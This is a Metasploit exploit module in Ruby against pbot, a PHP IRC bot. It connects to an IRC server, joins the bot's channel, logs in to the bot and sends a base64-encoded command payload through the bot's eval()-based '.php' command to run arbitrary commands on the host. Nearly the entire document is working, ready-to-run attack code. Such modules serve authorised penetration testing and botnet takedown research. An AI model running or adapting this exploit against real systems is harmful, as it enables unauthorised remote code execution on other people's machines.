PHP IRC Bot pbot eval() Remote Code Execution

  1. ##
  2. # This file is part of the Metasploit Framework and may be subject to
  3. # redistribution and commercial restrictions. Please see the Metasploit
  4. # web site for more information on licensing and terms of use.
  5. # http://metasploit.com/
  6. ##
  7.  
  8. require 'msf/core'
  9.  
  10.  
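class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata and user-facing options.
  #
  # Payload space is capped at 344 bytes because the whole command travels in a
  # single IRC PRIVMSG line, and RFC 2812 limits a line to 512 bytes including
  # the trailing CR-LF; the remainder is consumed by the PRIVMSG framing.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP IRC Bot pbot eval() Remote Code Execution',
      'Description'    => %q{
        This module allows remote command execution on the PHP IRC bot pbot by abusing
        the usage of eval() in the implementation of the .php command. In order to work,
        the data to connect to the IRC server and channel where find pbot must be provided.
        The module has been successfully tested on the version of pbot analyzed by Jay
        Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP
        SP3.
      },
      'Author'         =>
        [
          'evilcry', # pbot analysis'
          'Jay Turla', # pbot analysis
          '@bwallHatesTwits', # PoC
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'EDB', '20168' ],
          [ 'URL', 'http://offensivecomputing.net/?q=node/1417'],
          [ 'URL', 'http://resources.infosecinstitute.com/pbot-analysis/']
        ],
      'Platform'       => [ 'unix', 'win'],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 344, # According to RFC 2812, the max length message is 512, including the cr-lf
          'BadChars'    => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
            }
        },
      'Targets'        =>
        [
          [ 'pbot', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 02 2009',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']),
        OptString.new('PBOT_PASSWORD', [false, 'pbot Password', ''])
      ], self.class)
  end

  # Vulnerability check: register with the IRC server, join the channel and
  # attempt a pbot ".login". The socket is released on every exit path; the
  # early "Unknown" returns previously left the connection open.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when the IRC session cannot be
  #   established, Vulnerable when pbot acknowledges the login, Safe otherwise.
  def check
    connect
    begin
      irc_session_check
    ensure
      disconnect
    end
  end

  # Body of {#check}, run against an already-connected socket so that the
  # caller can guarantee cleanup with +ensure+.
  #
  # @return [Msf::Exploit::CheckCode]
  def irc_session_check
    response = register(sock)
    if irc_rejected?(response)
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return Exploit::CheckCode::Unknown
    end

    response = join(sock)
    unless joined?(response)
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return Exploit::CheckCode::Unknown
    end

    response = pbot_login(sock)
    quit(sock)

    if pbot_logged_in?(response)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # True when the registration reply carries numeric 463 or 464
  # (RFC 2812: no permission for host / password mismatch).
  #
  # @param response [String] raw server reply collected by {#send_msg}
  # @return [Boolean]
  def irc_rejected?(response)
    !!(response =~ /463/ || response =~ /464/)
  end

  # True when the JOIN reply carries numeric 353 (RPL_NAMREPLY) or
  # 366 (RPL_ENDOFNAMES), i.e. the server placed us in the channel.
  #
  # @param response [String]
  # @return [Boolean]
  def joined?(response)
    !!(response =~ /353/ || response =~ /366/)
  end

  # True when pbot answered the ".login" with text containing both "auth" and
  # "logged in"; both substrings are required, matching the original check.
  #
  # @param response [String]
  # @return [Boolean]
  def pbot_logged_in?(response)
    !!(response =~ /auth/ && response =~ /logged in/)
  end

  # Writes +data+ to +sock+ and drains the server's reply, reading in 1-second
  # slices until a read times out (get_once returns nil) or the peer closes
  # the connection (EOFError).
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @param data [String] raw IRC line(s) to send, CR-LF terminated by the caller
  # @return [String] everything received after the write, possibly empty
  def send_msg(sock, data)
    sock.put(data)
    reply = ""
    begin
      loop do
        chunk = sock.get_once(-1, 1)
        break if chunk.nil?
        reply << chunk
      end
    rescue EOFError
      # Peer closed the connection; hand back whatever arrived before that.
    end
    reply
  end

  # Sends the IRC registration sequence (optional PASS, then NICK and USER).
  # Nicknames longer than 9 characters (the RFC 2812 limit) are replaced by a
  # random 9-letter one, and the substitution is reported to the operator.
  #
  # @param sock [Rex::Socket]
  # @return [String] server reply to the registration
  def register(sock)
    msg = ""

    irc_password = datastore['IRC_PASSWORD']
    msg << "PASS #{irc_password}\r\n" if irc_password && !irc_password.empty?

    nick = datastore['NICK']
    if nick.length > 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    end

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    send_msg(sock, msg)
  end

  # Joins the configured CHANNEL.
  #
  # @param sock [Rex::Socket]
  # @return [String] server reply to the JOIN
  def join(sock)
    send_msg(sock, "JOIN #{datastore['CHANNEL']}\r\n")
  end

  # Sends pbot's ".login" command to the channel, appending PBOT_PASSWORD when
  # one was supplied. The bot's answer is what {#pbot_logged_in?} inspects.
  #
  # @param sock [Rex::Socket]
  # @return [String] channel traffic received after the login message
  def pbot_login(sock)
    login_msg = "PRIVMSG #{datastore['CHANNEL']} :.login"
    pbot_password = datastore['PBOT_PASSWORD']
    login_msg << " #{pbot_password}" if pbot_password && !pbot_password.empty?
    login_msg << "\r\n"
    send_msg(sock, login_msg)
  end

  # Delivers the payload through pbot's ".php" command, which hands its
  # argument to eval(). The command line travels as a plain-text PRIVMSG, so
  # the ".php" trigger and the "passthru(base64_decode(" wrapper are visible
  # in channel traffic and to the IRC server, which makes this activity easy
  # to detect from logs.
  #
  # @param sock [Rex::Socket]
  # @return [String] channel traffic received after the command
  def pbot_command(sock)
    encoded = Rex::Text.encode_base64(payload.encoded)
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :.php #{rand_text_alpha(1)} passthru(base64_decode(\"#{encoded}\"));\r\n"
    send_msg(sock, command_msg)
  end

  # Sends an IRC QUIT; the reply is not read.
  #
  # @param sock [Rex::Socket]
  def quit(sock)
    sock.put("QUIT :bye bye\r\n")
  end

  # Exploit entry point. Establishes the IRC session, authenticates to pbot
  # and delivers the payload; the socket is released on every exit path,
  # where the earlier version leaked it on the error returns.
  def exploit
    connect
    begin
      run_pbot_exploit
    ensure
      disconnect
    end
  end

  # Body of {#exploit}, run against an already-connected socket so that the
  # caller can guarantee cleanup with +ensure+.
  def run_pbot_exploit
    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    response = register(sock)
    if irc_rejected?(response)
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end

    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    response = join(sock)
    unless joined?(response)
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return
    end

    print_status("#{rhost}:#{rport} - Registering with the pbot...")
    response = pbot_login(sock)
    unless pbot_logged_in?(response)
      print_error("#{rhost}:#{rport} - Error registering with the pbot")
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the pbot...")
    pbot_command(sock)

    quit(sock)
  end
end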